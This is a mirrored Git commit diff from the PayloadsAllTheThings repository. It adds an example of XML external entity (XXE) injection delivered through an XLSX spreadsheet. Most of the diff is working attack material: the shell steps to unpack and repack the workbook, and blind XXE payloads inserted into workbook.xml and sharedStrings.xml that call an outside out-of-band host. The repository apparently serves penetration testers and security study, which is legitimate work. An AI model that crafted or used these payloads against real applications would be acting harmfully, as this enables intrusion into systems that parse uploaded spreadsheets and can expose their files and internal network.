mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-12 22:33:00 +00:00
Merge pull request #302 from noraj/patch-1
add another example of XXE in XLSX
This commit is contained in:
commit
2f83ee56f4
1 changed files with 12 additions and 3 deletions
|
@ -462,7 +462,7 @@ GIF (experimental)
|
|||
|
||||
Extract the excel file.
|
||||
|
||||
```powershell
|
||||
```
|
||||
$ mkdir XXE && cd XXE
|
||||
$ unzip ../XXE.xlsx
|
||||
Archive: ../XXE.xlsx
|
||||
|
@ -479,16 +479,24 @@ Archive: ../XXE.xlsx
|
|||
|
||||
Add your blind XXE payload inside `xl/workbook.xml`.
|
||||
|
||||
```powershell
|
||||
```xml
|
||||
<xml...>
|
||||
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
|
||||
<x>&xxe;</x>
|
||||
<workbook...>
|
||||
```
|
||||
|
||||
Alternativly, add your payload in `xl/sharedStrings.xml`:
|
||||
|
||||
```xml
|
||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
|
||||
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
|
||||
```
|
||||
|
||||
Rebuild the Excel file.
|
||||
|
||||
```powershell
|
||||
```
|
||||
$ zip -r ../poc.xlsx *
|
||||
updating: [Content_Types].xml (deflated 71%)
|
||||
updating: _rels/ (stored 0%)
|
||||
|
@ -539,6 +547,7 @@ cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml
|
|||
* [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe)
|
||||
* [Automating local DTD discovery for XXE exploitation](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - July 16 2019 by Philippe Arteau
|
||||
* [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)
|
||||
* [excel-reader-xlsx #10](https://github.com/jmcnamara/excel-reader-xlsx/issues/10)
|
||||
* [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)
|
||||
* [SynAck - A Deep Dive into XXE Injection](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/) - 22 July 2019 - Trenton Gordon
|
||||
* [Synacktiv - CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server](https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf) - 11-03-2019 - Julien SZLAMOWICZ, Sebastien DUDEK
|
||||
|
|
Loading…
Reference in a new issue